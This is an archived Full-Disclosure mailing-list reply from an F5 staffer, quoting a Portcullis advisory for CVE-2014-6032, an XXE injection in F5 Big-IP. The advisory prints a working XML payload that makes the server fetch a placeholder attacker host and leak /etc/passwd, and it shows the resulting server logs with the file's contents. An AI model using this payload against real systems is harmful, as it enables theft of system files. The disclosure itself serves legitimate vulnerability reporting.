| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 30 Oct 2014 15:23:12 +0000 From: Jeff Costlow <j.costlow@...com> To: "'fulldisclosure@...lists.org'" <fulldisclosure@...lists.org> Subject: Re: [FD] CVE-2014-6032 - XML External Entity Injection in F5 Networks Big-IP Thanks to Oliver for reporting these to F5. https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15605.html On 10/30/14, 3:22 AM, "Portcullis Advisories" <advisories@...tcullis-security.com> wrote: >Vulnerability title: XML External Entity Injection in F5 Networks Big-IP >CVE: CVE-2014-6032 >Vendor: F5 Networks >Product: Big-IP >Affected version: 11.3.0.39.0 >Fixed version: N/A >Reported by: Oliver Gruskovnjak > >Details: > >F5 Networks Big-IP is vulnerable to an XML External Entity injection >attack. The following xml payload was used to trigger the XXE (The >vulnerable URL is redacted due to the number of affected systems): > ><?xml version="1.0" encoding="utf-8"?> ><!DOCTYPE root [ ><!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote; >%int; >%trick;]> ><deal type="request" id="1"><card type="query" id="1"/></deal> > > >On the attacking Server the file can be read from web server logs: > > >10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd >HTTP/1.1" 200 128 >- -> /xml?f=/etc/passwd >10.1.10.10 - - [20/Aug/2014 00:17:44] "GET >/?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Ad >aemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nolo >gin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spo >ol/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0A >operator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sb >in/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x >:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/lo >cal/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nolo >gin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0 >Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfil >e:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd >:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapp >er%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f > >5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77: >77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/shar >e/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25: >25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013 > > > >Further details at: > >https://www.portcullis-security.com/security-research-and-downloads/securi >ty-advisories/cve-2014-6032/ > >Copyright: >Copyright (c) Portcullis Computer Security Limited 2014, All rights >reserved worldwide. Permission is hereby granted for the electronic >redistribution of this information. It is not to be edited or altered in >any way without the express written consent of Portcullis Computer >Security Limited. > >Disclaimer: >The information herein contained may change without notice. Use of this >information constitutes acceptance for use in an AS IS condition. There >are NO warranties, implied or otherwise, with regard to this information >or its use. Any use of this information is at the user's risk. In no >event shall the author/distributor (Portcullis Computer Security Limited) >be held liable for any damages whatsoever arising out of or in connection >with the use or spread of this information. > > >############################################################### >This email originates from the systems of Portcullis >Computer Security Limited, a Private limited company, >registered in England in accordance with the Companies >Act under number 02763799. The registered office >address of Portcullis Computer Security Limited is: >Portcullis House, 2 Century Court, Tolpits Lane, Watford, >United Kingdom, WD18 9RS. >The information in this email is confidential and may be >legally privileged. It is intended solely for the addressee. >Any opinions expressed are those of the individual and >do not represent the opinion of the organisation. Access >to this email by persons other than the intended recipient >is strictly prohibited. >If you are not the intended recipient, any disclosure, >copying, distribution or other action taken or omitted to be >taken in reliance on it, is prohibited and may be unlawful. >When addressed to our clients any opinions or advice >contained in this email is subject to the terms and >conditions expressed in the applicable Portcullis Computer >Security Limited terms of business. >############################################################### > >########################################################################## >########### >This e-mail message has been scanned for Viruses and Content and cleared >by MailMarshal. >########################################################################## >########### > >_______________________________________________ >Sent through the Full Disclosure mailing list >http://nmap.org/mailman/listinfo/fulldisclosure >Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists